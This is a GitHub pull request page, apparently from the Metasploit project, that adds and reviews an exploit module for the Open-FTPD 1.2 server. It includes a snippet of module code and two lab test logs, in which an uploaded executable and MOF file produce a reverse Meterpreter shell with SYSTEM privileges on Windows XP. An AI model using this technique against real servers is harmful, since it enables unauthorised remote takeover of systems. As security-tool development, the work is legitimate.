Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Open-FTPD 1.2 Writable Directory Traversal Execution #2211

Merged
merged 1 commit into from Aug 12, 2013

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Aug 12, 2013

Add Open-FTPD 1.2 Writable Directory Traversal Execution

Homepage: http://sourceforge.net/projects/open-ftpd/
Tested on 1.2 (Windows XP SP3) (EN)

Open-FTPD 1.2 Writable Directory Traversal Execution

@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Aug 12, 2013

Processing...

send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

# Tell the FTP server to download our file
send_cmd(['STOR', filename], false, conn)
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 Aug 12, 2013

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

According to the code, it looks like an arbitrary File Upload more than a directory traversal vulnerability, as written in the Name and Description of the module. Is it right or I'm forgetting something ?

Thanks!

Copy link
Contributor Author

@bcoles bcoles Aug 12, 2013

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You're correct. 'Arbitrary file upload' is more applicable.

Copy link
Contributor

@jvazquez-r7 jvazquez-r7 Aug 12, 2013

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Awesome, in this case, fixing things by myself, and landing, are just minor changes, thanks @bcoles!

@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Aug 12, 2013

Once comments are clarified by @bcoles it's ready to be landed:

msf exploit(open_ftpd_wbem) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload bexsGiK.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50356 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload BRhkiOcs.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50358 - Sending MOF (2190 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:2481) at 2013-08-12 09:10:39 -0500
[+] Deleted wbem\mof\good\BRhkiOcs.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: bexsGiK.exe

meterpreter > exit
[*] Shutting down Meterpreter...

jvazquez-r7 pushed a commit that referenced this issue Aug 12, 2013
@jvazquez-r7 jvazquez-r7 merged commit d63d7bc into rapid7:master Aug 12, 2013
1 check passed
@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Aug 12, 2013

Last changes here: 8ac01d3

Final test:

msf exploit(open_ftpd_wbem) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload luguTktG.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:52338 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload rgzFGsEGKn.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.0.3:52340 - Sending MOF (2199 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:1039) at 2013-08-12 11:18:55 -0500
[+] Deleted wbem\mof\good\rgzFGsEGKn.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: luguTktG.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

Thanks @bcoles !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants